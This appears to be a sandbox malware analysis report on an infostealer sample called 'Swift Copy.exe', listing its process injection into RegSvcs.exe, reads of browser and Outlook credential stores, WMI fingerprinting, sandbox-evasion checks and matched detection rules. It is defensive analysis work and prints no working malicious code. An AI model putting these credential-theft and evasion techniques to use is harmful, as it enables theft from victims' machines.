                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06C57D581_2_06C57D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06C5B2021_2_06C5B202
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06C530401_2_06C53040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06C5C1581_2_06C5C158
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06C576781_2_06C57678
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06C55CBB1_2_06C55CBB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06C5E3801_2_06C5E380
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06C523381_2_06C52338
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06C500401_2_06C50040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 1_2_06C500061_2_06C50006
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: String function: 00D90A30 appears 46 times
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: String function: 00D8F9F2 appears 31 times
                    Source: Swift Copy.exe, 00000000.00000003.1669123460.0000000003D2D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Swift Copy.exe
                    Source: Swift Copy.exe, 00000000.00000003.1672372933.0000000003B83000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Swift Copy.exe
                    Source: Swift Copy.exe, 00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefcc0edeb-3644-44a7-8b6d-3364cecb7337.exe4 vs Swift Copy.exe
                    Source: Swift Copy.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 0.2.Swift Copy.exe.ee0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000000.00000002.1678514155.0000000000EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, slKb.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, mAKJ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, xQRSe0Fg.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, n3rhMa.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, MQzE4FWn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, nSmgRyX5a1.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, 6IMLmJtk.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, 6IMLmJtk.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, 3HroK7qN.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, 3HroK7qN.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@2/2
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE37B5 GetLastError,FormatMessageW,0_2_00DE37B5
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DD10BF AdjustTokenPrivileges,CloseHandle,0_2_00DD10BF
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DD16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00DD16C3
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00DE51CD
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DFA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00DFA67C
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00DE648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00DE648E
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D742A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00D742A2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Users\user\Desktop\Swift Copy.exeFile created: C:\Users\user\AppData\Local\Temp\aut5F23.tmpJump to behavior
                    Source: Swift Copy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Swift Copy.exeReversingLabs: Detection: 64%
                    Source: unknownProcess created: C:\Users\user\Desktop\Swift Copy.exe "C:\Users\user\Desktop\Swift Copy.exe"
                    Source: C:\Users\user\Desktop\Swift Copy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Swift Copy.exe"
                    Source: C:\Users\user\Desktop\Swift Copy.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Swift Copy.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Swift Copy.exeStatic file information: File size 1294336 > 1048576
                    Source: Swift Copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: Swift Copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: Swift Copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: Swift Copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Swift Copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: Swift Copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: Swift Copy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: wntdll.pdbUGP source: Swift Copy.exe, 00000000.00000003.1671012395.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000003.1670003411.0000000003C00000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: Swift Copy.exe, 00000000.00000003.1671012395.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000003.1670003411.0000000003C00000.00000004.00001000.00020000.00000000.sdmp
                    Source: Swift Copy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: Swift Copy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: Swift Copy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: Swift Copy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: Swift Copy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D742DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00D742DE
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D90A76 push ecx; ret 0_2_00D90A89
                    Source: 0.2.Swift Copy.exe.ee0000.1.raw.unpack, SMn5.csHigh entropy of concatenated method names: '_8Vimx', 'f7lK', 'uMKvoi6J', 'FWTI9h04fKT', 'OvYNDn1nF7', 'Uc1YsRO0ov', 'qvyIh', 'Q626D', 'VHPMMtos', 'MchLpClTgX'
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00D8F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00D8F98E
                    Source: C:\Users\user\Desktop\Swift Copy.exeCode function: 0_2_00E01C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00E01C41
                    Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Swift Copy.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97642
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Swift Copy.exeAPI/Special instruction interceptor: Address: ED3244
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1623Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8245Jump to behavior
                    Source: C:\Users\user\Desktop\Swift Copy.exeAPI coverage: 3.8 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
